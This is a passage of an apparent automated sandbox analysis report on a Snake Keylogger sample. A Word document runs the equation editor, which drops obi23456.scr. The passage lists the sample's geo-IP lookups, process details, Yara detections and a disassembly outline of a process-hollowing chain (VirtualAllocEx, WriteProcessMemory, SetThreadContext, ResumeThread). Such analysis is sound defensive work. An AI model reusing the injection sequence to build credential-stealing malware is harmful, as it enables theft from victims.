                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3ww%2BdTuPTi7n1omSZHsyNj5%2BohblW7k5ZlYMmSgBGWjDpVH7OWcyFKXAKIN2mqM9TDXVce3WIKgxNrlvTrNyD%2FY1MdRn0NbzryxQbGMDHQjp3LtJxrVyeM1G8dIWcfSFG2C51lk7"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 89e193e22c493320-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-04 19:38:48 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                    2024-07-04 19:38:48 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    15192.168.2.2249181188.114.96.34433532C:\Users\user\AppData\Roaming\obi23456.scr
                    TimestampBytes transferredDirectionData
                    2024-07-04 19:38:49 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                    Host: reallyfreegeoip.org
                    2024-07-04 19:38:49 UTC712INHTTP/1.1 200 OK
                    Date: Thu, 04 Jul 2024 19:38:49 GMT
                    Content-Type: application/xml
                    Transfer-Encoding: chunked
                    Connection: close
                    access-control-allow-origin: *
                    vary: Accept-Encoding
                    Cache-Control: max-age=86400
                    CF-Cache-Status: HIT
                    Age: 35755
                    Last-Modified: Thu, 04 Jul 2024 09:42:54 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t%2Brvziqk0sczUG7Twnn%2B9E7NzpeenwyhyrfYTiNdd10pW0zaZs%2BQiDYoAoEUF1%2BOeu62MQpWvCbEcVuxR2UajxOCjs9zkLpcL4QNXhtk8pHkiADiwzMKBk%2FLfj4P7kkjY0f%2BMlYr"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 89e193eb78999e08-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-04 19:38:49 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                    2024-07-04 19:38:49 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    16192.168.2.2249183188.114.96.34433532C:\Users\user\AppData\Roaming\obi23456.scr
                    TimestampBytes transferredDirectionData
                    2024-07-04 19:38:51 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                    Host: reallyfreegeoip.org
                    Connection: Keep-Alive
                    2024-07-04 19:38:51 UTC706INHTTP/1.1 200 OK
                    Date: Thu, 04 Jul 2024 19:38:51 GMT
                    Content-Type: application/xml
                    Transfer-Encoding: chunked
                    Connection: close
                    access-control-allow-origin: *
                    vary: Accept-Encoding
                    Cache-Control: max-age=86400
                    CF-Cache-Status: HIT
                    Age: 35757
                    Last-Modified: Thu, 04 Jul 2024 09:42:54 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LYtX4ML2iAt0zgypufoXNqqYYDbU88kx1%2FRe4nNZkjkFpr07FGVwBMfON6XNDHXFpUhOjCSGlbOpj8jIKBG3oD%2FifP8ys0BWDX33%2BwZJLUv5IynDEJNQ1hY0hCN5shRKO22LfG5O"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 89e193f6fd0041b4-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-04 19:38:51 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                    2024-07-04 19:38:51 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    17192.168.2.2249185188.114.97.34433532C:\Users\user\AppData\Roaming\obi23456.scr
                    TimestampBytes transferredDirectionData
                    2024-07-04 19:38:52 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                    Host: reallyfreegeoip.org
                    Connection: Keep-Alive
                    2024-07-04 19:38:52 UTC706INHTTP/1.1 200 OK
                    Date: Thu, 04 Jul 2024 19:38:52 GMT
                    Content-Type: application/xml
                    Transfer-Encoding: chunked
                    Connection: close
                    access-control-allow-origin: *
                    vary: Accept-Encoding
                    Cache-Control: max-age=86400
                    CF-Cache-Status: HIT
                    Age: 35758
                    Last-Modified: Thu, 04 Jul 2024 09:42:54 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vbvaUHN%2BvAH6wY6tnWpduvhXvzz9qJpm2hl7UKF%2B%2BbvmWrMJsJKcD4kiFd9c40qOeSzCz9TD6Dyo3Ra4jC8zAXygMUFLGlhgGbVCxf8WjHjCUf1DTOcpvKpXQZga2KMNA5rIDTnv"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 89e193fedad1190a-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-04 19:38:52 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                    2024-07-04 19:38:52 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Target ID:0
                    Start time:15:38:20
                    Start date:04/07/2024
                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                    Imagebase:0x13f0b0000
                    File size:1'423'704 bytes
                    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:9
                    Start time:15:38:35
                    Start date:04/07/2024
                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Imagebase:0x400000
                    File size:543'304 bytes
                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:10
                    Start time:15:38:36
                    Start date:04/07/2024
                    Path:C:\Users\user\AppData\Roaming\obi23456.scr
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Roaming\obi23456.scr"
                    Imagebase:0x880000
                    File size:520'704 bytes
                    MD5 hash:F7BDADAFF67E573F145D2E8E32E32CD8
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: MALWARE_Win_DLInjector02, Description: Detects downloader injector, Source: 0000000A.00000002.414496758.0000000000310000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.417577947.00000000033B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.417577947.00000000033B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000A.00000002.417577947.00000000033B9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000A.00000002.417577947.00000000033B9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                    Antivirus matches:
                    • Detection: 100%, Joe Sandbox ML
                    • Detection: 58%, ReversingLabs
                    Reputation:low
                    Has exited:true

                    General

                    Target ID:11
                    Start time:15:38:37
                    Start date:04/07/2024
                    Path:C:\Users\user\AppData\Roaming\obi23456.scr
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Roaming\obi23456.scr"
                    Imagebase:0x880000
                    File size:520'704 bytes
                    MD5 hash:F7BDADAFF67E573F145D2E8E32E32CD8
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.937442781.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.937442781.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.937442781.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000B.00000002.937442781.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.937566804.0000000002431000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.937566804.0000000002281000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:false

                    Disassembly

                    Reset < >

                      Execution Graph

                      Execution Coverage:28.9%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:27.3%
                      Total number of Nodes:44
                      Total number of Limit Nodes:1
                      execution_graph 5331 1841b0 5333 1841ca 5331->5333 5332 18421a 5333->5332 5335 18425f 5333->5335 5336 1842a3 5335->5336 5355 183f98 5336->5355 5359 183fa0 5336->5359 5337 184771 5363 183e48 5337->5363 5367 183e40 5337->5367 5338 184a50 5349 183e48 WriteProcessMemory 5338->5349 5350 183e40 WriteProcessMemory 5338->5350 5339 184855 5339->5338 5343 183e48 WriteProcessMemory 5339->5343 5344 183e40 WriteProcessMemory 5339->5344 5340 184a8e 5341 184b76 5340->5341 5371 183d20 5340->5371 5375 183d18 5340->5375 5379 1840b9 5341->5379 5383 1840c0 5341->5383 5342 184c33 5342->5333 5343->5339 5344->5339 5349->5340 5350->5340 5356 183fe4 VirtualAllocEx 5355->5356 5358 18405c 5356->5358 5358->5337 5360 183fe4 VirtualAllocEx 5359->5360 5362 18405c 5360->5362 5362->5337 5364 183e94 WriteProcessMemory 5363->5364 5366 183f2d 5364->5366 5366->5339 5368 183e94 WriteProcessMemory 5367->5368 5370 183f2d 5368->5370 5370->5339 5372 183d69 Wow64SetThreadContext 5371->5372 5374 183de1 5372->5374 5374->5341 5376 183d69 Wow64SetThreadContext 5375->5376 5378 183de1 5376->5378 5378->5341 5380 184104 ResumeThread 5379->5380 5382 184150 5380->5382 5382->5342 5384 184104 ResumeThread 5383->5384 5386 184150 5384->5386 5386->5342 5387 1851d0 ReadProcessMemory 5388 18528f 5387->5388 5389 184da0 5390 184e2d CreateProcessW 5389->5390 5392 184f86 5390->5392

                      Executed Functions

                      Function 0018425F Relevance: 1.9, Strings: 1, Instructions: 624COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1712 18425f-1842a1 1713 1842a8-18442e 1712->1713 1714 1842a3 1712->1714 1721 184430-184454 1713->1721 1722 184455-18449a call 183694 1713->1722 1714->1713 1721->1722 1726 18449c-1844b8 1722->1726 1727 1844c3-18452d 1722->1727 1726->1727 1733 18452f 1727->1733 1734 184534-184560 1727->1734 1733->1734 1736 1845c1-1845f3 call 1836ac 1734->1736 1737 184562-184594 call 1836a0 1734->1737 1742 18461c 1736->1742 1743 1845f5-184611 1736->1743 1744 1845bd-1845bf 1737->1744 1745 184596-1845b2 1737->1745 1746 18461d-184627 1742->1746 1743->1742 1744->1746 1745->1744 1748 184629 1746->1748 1749 18462e-184674 call 1836b8 1746->1749 1748->1749 1755 18469d-1846b6 1749->1755 1756 184676-184692 1749->1756 1757 1846b8-1846e4 call 1836c4 1755->1757 1758 18470e-18476c 1755->1758 1756->1755 1764 18470d 1757->1764 1765 1846e6-184702 1757->1765 1844 18476f call 183f98 1758->1844 1845 18476f call 183fa0 1758->1845 1764->1758 1765->1764 1768 184771-184786 1769 184788-184799 1768->1769 1770 18479b-18479d 1768->1770 1772 1847a3-1847b7 1769->1772 1770->1772 1773 1847b9-1847f3 1772->1773 1774 1847f4-18480b 1772->1774 1773->1774 1775 18480d-184829 1774->1775 1776 184834-184850 1774->1776 1775->1776 1842 184853 call 183e48 1776->1842 1843 184853 call 183e40 1776->1843 1778 184855-184875 1780 18489e-1848d3 1778->1780 1781 184877-184893 1778->1781 1785 184a2b-184a4a 1780->1785 1781->1780 1786 1848d8-18495c 1785->1786 1787 184a50-184a89 1785->1787 1797 184a20-184a25 1786->1797 1798 184962-1849d1 1786->1798 1840 184a8c call 183e48 1787->1840 1841 184a8c call 183e40 1787->1841 1792 184a8e-184aae 1793 184ab0-184acc 1792->1793 1794 184ad7-184b0a 1792->1794 1793->1794 1800 184b0c-184b13 1794->1800 1801 184b14-184b27 1794->1801 1797->1785 1834 1849d4 call 183e48 1798->1834 1835 1849d4 call 183e40 1798->1835 1800->1801 1802 184b29 1801->1802 1803 184b2e-184b59 1801->1803 1802->1803 1808 184b5b-184b71 1803->1808 1809 184bc3-184bf5 call 1836d0 1803->1809 1838 184b74 call 183d18 1808->1838 1839 184b74 call 183d20 1808->1839 1816 184c1e 1809->1816 1817 184bf7-184c13 1809->1817 1811 1849d6-1849f6 1814 1849f8-184a14 1811->1814 1815 184a1f 1811->1815 1813 184b76-184b96 1818 184b98-184bb4 1813->1818 1819 184bbf-184bc1 1813->1819 1814->1815 1815->1797 1820 184c1f-184c2e 1816->1820 1817->1816 1818->1819 1819->1820 1836 184c31 call 1840b9 1820->1836 1837 184c31 call 1840c0 1820->1837 1824 184c33-184c53 1826 184c7c-184d85 1824->1826 1827 184c55-184c71 1824->1827 1827->1826 1834->1811 1835->1811 1836->1824 1837->1824 1838->1813 1839->1813 1840->1792 1841->1792 1842->1778 1843->1778 1844->1768 1845->1768
                      Strings
                      Memory Dump Source
                      • Source File: 0000000A.00000002.414086646.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_180000_obi23456.jbxd
                      Similarity
                      • API ID:
                      • String ID: (
                      • API String ID: 0-3887548279
                      • Opcode ID: 779b362768e10f9a4cc69cdddec44beb0feba8f116f369e58a2b9e0cb098fa99
                      • Instruction ID: 449850047f61f1c2051dc33162ea0fdcdd7f7dd808c2a758fff47add377a1731
                      • Opcode Fuzzy Hash: 779b362768e10f9a4cc69cdddec44beb0feba8f116f369e58a2b9e0cb098fa99
                      • Instruction Fuzzy Hash: 5E52E274D012298FDB68DF65C894BEDBBB2AF89301F1481EAD409AB295DB345F85CF40
                      Function 00184D95 Relevance: 1.7, APIs: 1, Instructions: 221processCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1846 184d95-184e2b 1847 184e2d-184e3f 1846->1847 1848 184e42-184e50 1846->1848 1847->1848 1849 184e52-184e64 1848->1849 1850 184e67-184ea3 1848->1850 1849->1850 1851 184ea5-184eb4 1850->1851 1852 184eb7-184f84 CreateProcessW 1850->1852 1851->1852 1856 184f8d-18504c 1852->1856 1857 184f86-184f8c 1852->1857 1867 18504e-185077 1856->1867 1868 185082-18508d 1856->1868 1857->1856 1867->1868 1872 18508e 1868->1872 1872->1872
                      APIs
                      • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00184F71
                      Memory Dump Source
                      • Source File: 0000000A.00000002.414086646.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_180000_obi23456.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: 21aa051ebaaf31c4ea84fe8d6ab7ff2e970060e10df46b3f751fda192175b6d3
                      • Instruction ID: 02c343317341f764ef3b05d1cefd0b037fea42022d2bb32e7a882f0f5d46da21
                      • Opcode Fuzzy Hash: 21aa051ebaaf31c4ea84fe8d6ab7ff2e970060e10df46b3f751fda192175b6d3
                      • Instruction Fuzzy Hash: 8581D274C002599FDF25DFA9C940BEDBBB5BF09300F1091AAE508B7260DB709A89CF54
                      Function 00184DA0 Relevance: 1.7, APIs: 1, Instructions: 220processCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1873 184da0-184e2b 1874 184e2d-184e3f 1873->1874 1875 184e42-184e50 1873->1875 1874->1875 1876 184e52-184e64 1875->1876 1877 184e67-184ea3 1875->1877 1876->1877 1878 184ea5-184eb4 1877->1878 1879 184eb7-184f84 CreateProcessW 1877->1879 1878->1879 1883 184f8d-18504c 1879->1883 1884 184f86-184f8c 1879->1884 1894 18504e-185077 1883->1894 1895 185082-18508d 1883->1895 1884->1883 1894->1895 1899 18508e 1895->1899 1899->1899
                      APIs
                      • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00184F71
                      Memory Dump Source
                      • Source File: 0000000A.00000002.414086646.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_180000_obi23456.jbxd
                      Similarity
                      • API ID: CreateProcess
                      • String ID:
                      • API String ID: 963392458-0
                      • Opcode ID: 17818da58f2936de521b988be2bfd07ea4faab87b205b09022e3f13de4409024
                      • Instruction ID: d380387cbc31e2362393803558a3aa6d90903230e7eba652fdabdc94a69aa5ea
                      • Opcode Fuzzy Hash: 17818da58f2936de521b988be2bfd07ea4faab87b205b09022e3f13de4409024
                      • Instruction Fuzzy Hash: C881C274C002599FDF25DFA9C980BEDBBB5BF09300F1091AAE508B7260DB749A89CF54
                      Function 00183E40 Relevance: 1.6, APIs: 1, Instructions: 117injectionCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1900 183e40-183eb3 1902 183eca-183f2b WriteProcessMemory 1900->1902 1903 183eb5-183ec7 1900->1903 1905 183f2d-183f33 1902->1905 1906 183f34-183f86 1902->1906 1903->1902 1905->1906
                      APIs
                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00183F1B
                      Memory Dump Source
                      • Source File: 0000000A.00000002.414086646.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_180000_obi23456.jbxd
                      Similarity
                      • API ID: MemoryProcessWrite
                      • String ID:
                      • API String ID: 3559483778-0
                      • Opcode ID: 78be19cd2c37b13b591f28b7304ae35b6e9177c1375d941cf44a6360a9011f5c
                      • Instruction ID: e8ddab5b5848899aa1b331998bace348c4c44eb47c58f075472ebce19ac61e74
                      • Opcode Fuzzy Hash: 78be19cd2c37b13b591f28b7304ae35b6e9177c1375d941cf44a6360a9011f5c
                      • Instruction Fuzzy Hash: 3F41BAB5D012489FCF00CFA9D984AEEFBF1BB49310F24942AE814B7250D334AA45CF64
                      Function 00183E48 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1911 183e48-183eb3 1913 183eca-183f2b WriteProcessMemory 1911->1913 1914 183eb5-183ec7 1911->1914 1916 183f2d-183f33 1913->1916 1917 183f34-183f86 1913->1917 1914->1913 1916->1917
                      APIs
                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00183F1B
                      Memory Dump Source
                      • Source File: 0000000A.00000002.414086646.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_180000_obi23456.jbxd
                      Similarity
                      • API ID: MemoryProcessWrite
                      • String ID:
                      • API String ID: 3559483778-0
                      • Opcode ID: fdaa74f99587b9d986762695810edc8c9bea4fe926cb47df8bf4aa5e1cdf1a82
                      • Instruction ID: cc1bd8bd34452cee5bd01cbb091c8924b75942c9a6156d31b892ac249988b87c
                      • Opcode Fuzzy Hash: fdaa74f99587b9d986762695810edc8c9bea4fe926cb47df8bf4aa5e1cdf1a82
                      • Instruction Fuzzy Hash: 51419AB5D012589FCF10CFA9D984AEEFBF1BB49314F24942AE814B7250D374AA45CF64
                      Function 00183F98 Relevance: 1.6, APIs: 1, Instructions: 106memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1922 183f98-18405a VirtualAllocEx 1925 18405c-184062 1922->1925 1926 184063-1840ad 1922->1926 1925->1926
                      APIs
                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0018404A
                      Memory Dump Source
                      • Source File: 0000000A.00000002.414086646.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_180000_obi23456.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: d2a0361558d9cd1417a6575f12e4c9d654a8044ecb937bd43454eaa11ba702cf
                      • Instruction ID: fb518d7d2a8a246087a90afefde8f1d12514f59740ac2240aacd1396620166d4
                      • Opcode Fuzzy Hash: d2a0361558d9cd1417a6575f12e4c9d654a8044ecb937bd43454eaa11ba702cf
                      • Instruction Fuzzy Hash: 743198B8D042589FCF10CFA9D984AEEFBB1EB49310F20942AE815B7214C735A946CF55
                      Function 001851C8 Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1931 1851c8-18528d ReadProcessMemory 1932 18528f-185295 1931->1932 1933 185296-1852d4 1931->1933 1932->1933
                      APIs
                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0018527D
                      Memory Dump Source
                      • Source File: 0000000A.00000002.414086646.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_180000_obi23456.jbxd
                      Similarity
                      • API ID: MemoryProcessRead
                      • String ID:
                      • API String ID: 1726664587-0
                      • Opcode ID: 245bc7dfb8d10f1274e9a3efff15b278d14debae987aa2a397ca0342190c1e6c
                      • Instruction ID: b065a4b9170c3e5c1f0316e2f0c85f7d070f32a3d8c837561d5cace3d819e194
                      • Opcode Fuzzy Hash: 245bc7dfb8d10f1274e9a3efff15b278d14debae987aa2a397ca0342190c1e6c
                      • Instruction Fuzzy Hash: FE4168B9D04258DFCF10CFA9D984ADEFBB1BB19310F24906AE815B7210D375AA45CF64
                      Function 00183FA0 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1936 183fa0-18405a VirtualAllocEx 1939 18405c-184062 1936->1939 1940 184063-1840ad 1936->1940 1939->1940
                      APIs
                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0018404A
                      Memory Dump Source
                      • Source File: 0000000A.00000002.414086646.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                      Joe Sandbox IDA Plugin
